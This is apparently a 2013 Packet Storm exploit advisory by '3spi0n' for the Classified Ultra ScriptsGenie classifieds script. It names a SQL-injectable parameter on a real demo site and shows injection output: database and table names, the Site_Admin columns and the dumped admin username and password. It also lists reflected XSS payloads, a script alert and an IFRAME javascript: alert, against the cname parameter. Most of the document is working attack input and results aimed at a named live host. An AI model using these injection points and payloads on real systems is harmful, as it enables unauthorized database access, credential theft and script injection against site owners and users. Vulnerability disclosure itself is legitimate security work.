Classified Ultra ScriptsGenie Cross Site Scripting / SQL Injection

2013-01-20T00:00:00
ID PACKETSTORM:119675
Type packetstorm
Reporter 3spi0n
Modified 2013-01-20T00:00:00

Description

                                        
                                            `# Exploit Title; Classified Ultra ScriptsGenie Multiple Vulnerabilities  
# Date; 20/1/13  
# Author; 3spi0n  
# Script Vendor or Software Link;  
http://www.hotscripts.com/listing/classified-ultra-scriptsgenie/  
# Category; Webapps  
# Type; SQL Injection [MySQLi]  
# Tested on; Ubuntu 12.10 / Win7 / Backtrack 5  
  
[#] Demo Analyzing ;  
  
# http://resalemembership.com/demos/classifiedultra/nclass.php [Official  
Demo]  
  
[#] Vulnerable Analyzing ;  
  
[-] SQL Injection  
  
# http://resalemembership.com/demos/classifiedultra/subclass.php?c=16'  
[SQLi HERE]  
  
[...] Analyzing  
  
Selected Column Count is 4  
Valid String Column is 3  
Current DB: resalem1_ultra  
...  
Tables found:  
Site_Admin,clientsignup,contact,o_ads,o_categories,o_catimages,o_subcategories  
[Using "Site_Admin"]  
...  
Columns found: id,admin,passme  
...  
Data Found: admin=admin  
Data Found: passme=pass  
  
[-] XSS  
  
#  
http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS  
HERE]  
  
[...] Analyzing  
  
# http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=  
<script>alert('3spi0n')</script>  
# http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=<IFRAME  
SRC="javascript:alert('3spi0n');"></IFRAME>  
  
[#] Greetz ;  
  
- Grayhatz Inc. & Janissaries Team  
- Twitter.Com/bariiiscan - Facebook.Com/3spi0ne  
`